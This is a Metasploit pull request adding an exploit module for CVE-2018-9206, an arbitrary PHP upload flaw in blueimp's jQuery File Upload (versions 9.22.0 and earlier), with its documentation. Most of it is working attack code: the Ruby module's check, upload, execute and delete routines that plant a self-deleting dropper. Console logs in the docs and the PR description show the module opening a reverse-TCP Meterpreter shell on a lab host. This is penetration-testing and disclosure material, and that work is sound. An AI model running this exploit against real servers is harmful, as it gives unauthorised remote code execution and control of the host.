### PR TITLE
Add blueimp's jQuery (Arbitrary) File Upload

### DIFF
--- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
@@ -1,0 +1,57 @@
+## Intro
+
+This module exploits an arbitrary file upload in the sample PHP upload
+handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
+
+Due to a default configuration in Apache 2.3.9+, the widget's `.htaccess`
+file may be disabled, enabling exploitation of this vulnerability.
+
+## Setup
+
+<https://github.com/blueimp/jQuery-File-Upload/wiki/Setup#using-jquery-file-upload-ui-version-on-php-websites>
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   PHP Dropper
+1   Linux Dropper
+```
+
+## Options
+
+**TARGETURI**
+
+Set this to the base path of jQuery File Upload. `/jQuery-File-Upload`
+and those including a version are common. `/upload` may be another.
+You may want to use another tool like `dirb` to handle enumeration.
+
+## Usage
+
+```
+msf5 exploit(unix/webapp/jquery_file_upload) > check
+
+[*] Checking /jQuery-File-Upload/server/php/index.php
+[+] Found /jQuery-File-Upload/server/php/index.php
+[*] 172.28.128.3:80 The target service is running, but could not be validated.
+msf5 exploit(unix/webapp/jquery_file_upload) > run
+
+[*] Started reverse TCP handler on 172.28.128.1:4444
+[*] Checking /jQuery-File-Upload/server/php/index.php
+[+] Found /jQuery-File-Upload/server/php/index.php
+[*] Uploading payload
+[+] Payload uploaded: http://172.28.128.3/jQuery-File-Upload/server/php/files/yJF5WXoQgkwW1zK9nDxialLMXg.php
+[*] Executing payload
+[*] Sending stage (37775 bytes) to 172.28.128.3
+[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54382) at 2018-10-22 22:20:20 -0500
+[*] Deleting payload
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : ubuntu-xenial
+OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
+Meterpreter : php/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
@@ -38,19 +38,23 @@ You may want to use another tool like `dirb` to handle enumeration.
 ```
 msf5 exploit(unix/webapp/jquery_file_upload) > check
 
-[*] Checking /jQuery-File-Upload/server/php/index.php
-[+] Found /jQuery-File-Upload/server/php/index.php
-[*] 172.28.128.3:80 The target service is running, but could not be validated.
+[*] Checking /jQuery-File-Upload/package.json
+[+] Found Apache 2.4.18 (AllowOverride None)
+[+] Found unpatched jQuery File Upload 9.22.0
+[*] 172.28.128.3:80 The target appears to be vulnerable.
 msf5 exploit(unix/webapp/jquery_file_upload) > run
 
 [*] Started reverse TCP handler on 172.28.128.1:4444
+[*] Checking /jQuery-File-Upload/package.json
+[+] Found Apache 2.4.18 (AllowOverride None)
+[+] Found unpatched jQuery File Upload 9.22.0
 [*] Checking /jQuery-File-Upload/server/php/index.php
 [+] Found /jQuery-File-Upload/server/php/index.php
 [*] Uploading payload
-[+] Payload uploaded: http://172.28.128.3/jQuery-File-Upload/server/php/files/yJF5WXoQgkwW1zK9nDxialLMXg.php
+[+] Payload uploaded: http://172.28.128.3/jQuery-File-Upload/server/php/files/FJx2tZWpurPHKIWaYX7sbGTraXTNlRaBB.php
 [*] Executing payload
 [*] Sending stage (37775 bytes) to 172.28.128.3
-[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54382) at 2018-10-22 22:20:20 -0500
+[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54414) at 2018-10-23 07:13:22 -0500
 [*] Deleting payload
 
 meterpreter > getuid

--- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
@@ -39,14 +39,14 @@ You may want to use another tool like `dirb` to handle enumeration.
 msf5 exploit(unix/webapp/jquery_file_upload) > check
 
 [*] Checking /jQuery-File-Upload/package.json
-[+] Found Apache 2.4.18 (AllowOverride None)
+[+] Found Apache 2.4.18 (AllowOverride None may be set)
 [+] Found unpatched jQuery File Upload 9.22.0
 [*] 172.28.128.3:80 The target appears to be vulnerable.
 msf5 exploit(unix/webapp/jquery_file_upload) > run
 
 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Checking /jQuery-File-Upload/package.json
-[+] Found Apache 2.4.18 (AllowOverride None)
+[+] Found Apache 2.4.18 (AllowOverride None may be set)
 [+] Found unpatched jQuery File Upload 9.22.0
 [*] Checking /jQuery-File-Upload/server/php/index.php
 [+] Found /jQuery-File-Upload/server/php/index.php

--- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
@@ -7,7 +7,10 @@ Due to a default configuration in Apache 2.3.9+, the widget's `.htaccess`
 file may be disabled, enabling exploitation of this vulnerability.
 
 This vulnerability has been exploited in the wild since at least 2015
-and was publicly disclosed to the vendor in 2018.
+and was publicly disclosed to the vendor in 2018. It has been present
+since the `.htaccess` change in Apache 2.3.9.
+
+This module provides a generic exploit against the jQuery widget.
 
 ## Setup
 

--- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
+++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md
@@ -6,6 +6,9 @@ handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
 Due to a default configuration in Apache 2.3.9+, the widget's `.htaccess`
 file may be disabled, enabling exploitation of this vulnerability.
 
+This vulnerability has been exploited in the wild since at least 2015
+and was publicly disclosed to the vendor in 2018.
+
 ## Setup
 
 <https://github.com/blueimp/jQuery-File-Upload/wiki/Setup#using-jquery-file-upload-ui-version-on-php-websites>

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -43,26 +43,47 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     register_options([
-      OptString.new('TARGETURI', [true, 'jQuery File Upload base path', '/'])
+      OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
     ])
   end
 
-  def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, 'server/php/index.php')
-    )
+  # List from PoC
+  def upload_paths
+    %w[
+      /server/php/index.php
+      /server/php/upload.class.php
+      /example/upload.php
+      /server/php/UploadHandler.php
+      /php/index.php
+    ].map { |u| normalize_uri(target_uri.path, u) }
+  end
 
-    if res && res.code == 200
-      return CheckCode::Detected
+  def check
+    upload_paths.each do |u|
+      vprint_status("Checking #{u}")
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => u
+      )
+
+      if res && res.code == 200
+        vprint_good("Found #{u}")
+        @u = u
+        return CheckCode::Detected
+      end
     end
 
     CheckCode::Safe
   end
 
   def exploit
+    unless check == CheckCode::Detected
+      fail_with(Failure::NotFound, 'Could not find target')
+    end
+
     f = "#{rand_text_alphanumeric(8..42)}.php"
-    u = normalize_uri(target_uri.path, "server/php/files/#{f}")
+    u = normalize_uri(File.dirname(@u), 'files', f)
 
     print_status('Uploading payload')
     res = upload_payload(f)
@@ -88,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, 'server/php/index.php'),
+      'uri'    => @u,
       'ctype'  => "multipart/form-data; boundary=#{m.bound}",
       'data'   => m.to_s
     )
@@ -104,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def delete_payload(f)
     send_request_cgi(
       'method'   => 'DELETE',
-      'uri'      => normalize_uri(target_uri.path, 'server/php/index.php'),
+      'uri'      => @u,
       'vars_get' => {'file' => f}
     )
   end

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -92,12 +92,10 @@ class MetasploitModule < Msf::Exploit::Remote
         res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
           $1 && (a = Gem::Version.new($1))
 
-        # We have to make some assumptions about configuration here
         if a && a >= Gem::Version.new('2.3.9')
-          vprint_good("Found Apache #{a} (AllowOverride None)")
+          vprint_good("Found Apache #{a} (AllowOverride None may be set)")
         elsif a
-          vprint_error("Found Apache #{a} (AllowOverride All)")
-          return CheckCode::Safe
+          vprint_warning("Found Apache #{a} (AllowOverride All may be set)")
         end
       end
 

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -19,9 +19,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
         Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
         file may be disabled, enabling exploitation of this vulnerability.
+
+        This vulnerability has been exploited in the wild since at least 2015
+        and was publicly disclosed to the vendor in 2018.
       },
       'Author'         => [
-        'Larry W. Cashdollar', # Discovery and PoC
+        'Larry W. Cashdollar', # Advisory and PoC
         'wvu'                  # Metasploit module
       ],
       'References'     => [
@@ -30,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
         ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206']
       ],
-      'DisclosureDate' => 'Oct 9 2018',
+      'DisclosureDate' => 'Oct 9 2018', # Public disclosure
       'License'        => MSF_LICENSE,
       'Platform'       => ['php', 'linux'],
       'Arch'           => [ARCH_PHP, ARCH_X86, ARCH_X64],

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -47,13 +47,13 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  # List from PoC
+  # List from PoC sorted by frequency
   def upload_paths
     %w[
       /server/php/index.php
       /server/php/upload.class.php
-      /example/upload.php
       /server/php/UploadHandler.php
+      /example/upload.php
       /php/index.php
     ].map { |u| normalize_uri(target_uri.path, u) }
   end

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -21,7 +21,10 @@ class MetasploitModule < Msf::Exploit::Remote
         file may be disabled, enabling exploitation of this vulnerability.
 
         This vulnerability has been exploited in the wild since at least 2015
-        and was publicly disclosed to the vendor in 2018.
+        and was publicly disclosed to the vendor in 2018. It has been present
+        since the .htaccess change in Apache 2.3.9.
+
+        This module provides a generic exploit against the jQuery widget.
       },
       'Author'         => [
         'Claudio Viviani',     # WordPress Work the Flow (Arbitrary) File Upload
@@ -34,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
         ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
         ['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
-        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130']
+        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130'],
+        ['URL', 'https://httpd.apache.org/docs/current/mod/core.html#allowoverride']
       ],
       'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
       'License'        => MSF_LICENSE,

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -49,6 +49,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     f = "#{rand_text_alphanumeric(8..42)}.php"
+    u = normalize_uri(target_uri.path, "server/php/files/#{f}")
+
+    print_status('Uploading payload')
+    res = upload_payload(f)
+
+    unless res && res.code == 200 && res.body.include?(f)
+      fail_with(Failure::NotVulnerable, 'Could not upload payload')
+    end
+
+    print_good("Payload uploaded: #{full_uri(u)}")
+
+    print_status('Executing payload')
+    exec_payload(u)
+
+    print_status('Deleting payload')
+    delete_payload(f)
+  end
+
+  def upload_payload(f)
     p = get_write_exec_payload(unlink_self: true)
 
     m = Rex::MIME::Message.new
@@ -60,12 +79,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'  => "multipart/form-data; boundary=#{m.bound}",
       'data'   => m.to_s
     )
+  end
 
+  def exec_payload(u)
     send_request_cgi({
       'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, "server/php/files/#{f}")
+      'uri'    => u
     }, 1)
+  end
 
+  def delete_payload(f)
     send_request_cgi(
       'method'   => 'DELETE',
       'uri'      => normalize_uri(target_uri.path, 'server/php/index.php'),

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -47,6 +47,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'server/php/index.php')
+    )
+
+    if res && res.code == 200
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
   def exploit
     f = "#{rand_text_alphanumeric(8..42)}.php"
     u = normalize_uri(target_uri.path, "server/php/files/#{f}")

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -24,16 +24,19 @@ class MetasploitModule < Msf::Exploit::Remote
         and was publicly disclosed to the vendor in 2018.
       },
       'Author'         => [
-        'Larry W. Cashdollar', # Advisory and PoC
+        'Claudio Viviani',     # WordPress Work the Flow (Arbitrary) File Upload
+        'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
         'wvu'                  # Metasploit module
       ],
       'References'     => [
         ['CVE', '2018-9206'],
         ['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
         ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
-        ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206']
+        ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
+        ['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
+        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130']
       ],
-      'DisclosureDate' => 'Oct 9 2018', # Public disclosure
+      'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
       'License'        => MSF_LICENSE,
       'Platform'       => ['php', 'linux'],
       'Arch'           => [ARCH_PHP, ARCH_X86, ARCH_X64],

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -57,6 +57,13 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
+  def version_paths
+    %w[
+      /package.json
+      /bower.json
+    ].map { |u| normalize_uri(target_uri.path, u) }
+  end
+
   # List from PoC sorted by frequency
   def upload_paths
     %w[
@@ -69,6 +76,30 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    version_paths.each do |u|
+      vprint_status("Checking #{u}")
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => u
+      )
+
+      next unless res && res.code == 200 && (j = res.get_json_document) &&
+                  j['version'] && (v = Gem::Version.new(j['version']))
+
+      if v <= Gem::Version.new('9.22.0')
+        vprint_good("Found unpatched version #{v}")
+        return CheckCode::Appears
+      else
+        vprint_error("Found patched version #{v}")
+        return CheckCode::Safe
+      end
+    end
+
+    CheckCode::Unknown
+  end
+
+  def find_upload
     upload_paths.each do |u|
       vprint_status("Checking #{u}")
 
@@ -79,39 +110,38 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if res && res.code == 200
         vprint_good("Found #{u}")
-        @u = u
-        return CheckCode::Detected
+        return u
       end
     end
 
-    CheckCode::Safe
+    nil
   end
 
   def exploit
-    unless check == CheckCode::Detected
+    unless check == CheckCode::Appears && (u = find_upload)
       fail_with(Failure::NotFound, 'Could not find target')
     end
 
     f = "#{rand_text_alphanumeric(8..42)}.php"
-    u = normalize_uri(File.dirname(@u), 'files', f)
+    p = normalize_uri(File.dirname(u), 'files', f)
 
     print_status('Uploading payload')
-    res = upload_payload(f)
+    res = upload_payload(u, f)
 
     unless res && res.code == 200 && res.body.include?(f)
       fail_with(Failure::NotVulnerable, 'Could not upload payload')
     end
 
-    print_good("Payload uploaded: #{full_uri(u)}")
+    print_good("Payload uploaded: #{full_uri(p)}")
 
     print_status('Executing payload')
-    exec_payload(u)
+    exec_payload(p)
 
     print_status('Deleting payload')
-    delete_payload(f)
+    delete_payload(u, f)
   end
 
-  def upload_payload(f)
+  def upload_payload(u, f)
     p = get_write_exec_payload(unlink_self: true)
 
     m = Rex::MIME::Message.new
@@ -119,23 +149,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri'    => @u,
+      'uri'    => u,
       'ctype'  => "multipart/form-data; boundary=#{m.bound}",
       'data'   => m.to_s
     )
   end
 
-  def exec_payload(u)
+  def exec_payload(p)
     send_request_cgi({
       'method' => 'GET',
-      'uri'    => u
+      'uri'    => p
     }, 1)
   end
 
-  def delete_payload(f)
+  def delete_payload(u, f)
     send_request_cgi(
       'method'   => 'DELETE',
-      'uri'      => @u,
+      'uri'      => u,
       'vars_get' => {'file' => f}
     )
   end

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -18,13 +18,14 @@ class MetasploitModule < Msf::Exploit::Remote
         handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
       },
       'Author'         => [
-        'Larry W. Cashdollar', # Discovery
-        'wvu'                  # Module
+        'Larry W. Cashdollar', # Discovery and PoC
+        'wvu'                  # Metasploit module
       ],
       'References'     => [
         ['CVE', '2018-9206'],
         ['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
-        ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514']
+        ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
+        ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206']
       ],
       'DisclosureDate' => 'Oct 9 2018',
       'License'        => MSF_LICENSE,

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "blueimp's jQuery (Arbitrary) File Upload",
+      'Description'    => %q{
+        This module exploits an arbitrary file upload in the sample PHP upload
+        handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
+      },
+      'Author'         => [
+        'Larry W. Cashdollar', # Discovery
+        'wvu'                  # Module
+      ],
+      'References'     => [
+        ['CVE', '2018-9206'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
+        ['URL', 'https://github.com/blueimp/jQuery-File-Upload']
+      ],
+      'DisclosureDate' => 'Oct 9 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php', 'linux'],
+      'Arch'           => [ARCH_PHP, ARCH_X86, ARCH_X64],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['PHP Dropper',   'Platform' => 'php',   'Arch' => ARCH_PHP],
+        ['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64]]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'jQuery File Upload base path', '/'])
+    ])
+  end
+
+  def exploit
+    f = "#{rand_text_alphanumeric(8..42)}.php"
+    p = get_write_exec_payload(unlink_self: true)
+
+    m = Rex::MIME::Message.new
+    m.add_part(p, nil, nil, %(form-data; name="files[]"; filename="#{f}"))
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'server/php/index.php'),
+      'ctype'  => "multipart/form-data; boundary=#{m.bound}",
+      'data'   => m.to_s
+    )
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "server/php/files/#{f}")
+    )
+
+    send_request_cgi(
+      'method'   => 'DELETE',
+      'uri'      => normalize_uri(target_uri.path, 'server/php/index.php'),
+      'vars_get' => {'file' => f}
+    )
+  end
+
+end

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     => [
         ['CVE', '2018-9206'],
         ['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
-        ['URL', 'https://github.com/blueimp/jQuery-File-Upload']
+        ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514']
       ],
       'DisclosureDate' => 'Oct 9 2018',
       'License'        => MSF_LICENSE,

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -61,10 +61,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'data'   => m.to_s
     )
 
-    send_request_cgi(
+    send_request_cgi({
       'method' => 'GET',
       'uri'    => normalize_uri(target_uri.path, "server/php/files/#{f}")
-    )
+    }, 1)
 
     send_request_cgi(
       'method'   => 'DELETE',

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -16,6 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits an arbitrary file upload in the sample PHP upload
         handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
+
+        Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
+        file may be disabled, enabling exploitation of this vulnerability.
       },
       'Author'         => [
         'Larry W. Cashdollar', # Discovery and PoC

--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -76,6 +76,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    a = nil
+
     version_paths.each do |u|
       vprint_status("Checking #{u}")
 
@@ -84,14 +86,29 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri'    => u
       )
 
-      next unless res && res.code == 200 && (j = res.get_json_document) &&
+      next unless res
+
+      unless a
+        res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
+          $1 && (a = Gem::Version.new($1))
+
+        # We have to make some assumptions about configuration here
+        if a && a >= Gem::Version.new('2.3.9')
+          vprint_good("Found Apache #{a} (AllowOverride None)")
+        elsif a
+          vprint_error("Found Apache #{a} (AllowOverride All)")
+          return CheckCode::Safe
+        end
+      end
+
+      next unless res.code == 200 && (j = res.get_json_document) &&
                   j['version'] && (v = Gem::Version.new(j['version']))
 
       if v <= Gem::Version.new('9.22.0')
-        vprint_good("Found unpatched version #{v}")
+        vprint_good("Found unpatched jQuery File Upload #{v}")
         return CheckCode::Appears
       else
-        vprint_error("Found patched version #{v}")
+        vprint_error("Found patched jQuery File Upload #{v}")
         return CheckCode::Safe
       end
     end


### PR DESCRIPTION
From @busterb: https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/.

And as noted by @bcoles, we also have a module exploiting this vuln in #5130, though it was described as the WordPress plugin and not the *asset* it had included. The vuln was "patched" in the **plugin** by [deleting](https://github.com/wp-plugins/work-the-flow-file-upload/commit/5f04fdf4f302cd89413e2554ee90d0b1cfb91cf2) the code. Somehow this flew under everyone's noses.

```
msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```

Welp.

```
msf5 exploit(unix/webapp/jquery_file_upload) > check

[*] Checking /jQuery-File-Upload/package.json
[+] Found Apache 2.4.18 (AllowOverride None may be set)
[+] Found unpatched jQuery File Upload 9.22.0
[*] 172.28.128.3:80 The target appears to be vulnerable.
msf5 exploit(unix/webapp/jquery_file_upload) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Checking /jQuery-File-Upload/package.json
[+] Found Apache 2.4.18 (AllowOverride None may be set)
[+] Found unpatched jQuery File Upload 9.22.0
[*] Checking /jQuery-File-Upload/server/php/index.php
[+] Found /jQuery-File-Upload/server/php/index.php
[*] Uploading payload
[+] Payload uploaded: http://172.28.128.3/jQuery-File-Upload/server/php/files/FJx2tZWpurPHKIWaYX7sbGTraXTNlRaBB.php
[*] Executing payload
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54414) at 2018-10-23 07:13:22 -0500
[*] Deleting payload

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```

### Edit: Oops, I didn't see this from @lcashdol...

> I should really write a metasploit module.

https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206

@lcashdol: If you're working on a module, would you like to collaborate? I apologize for missing your note.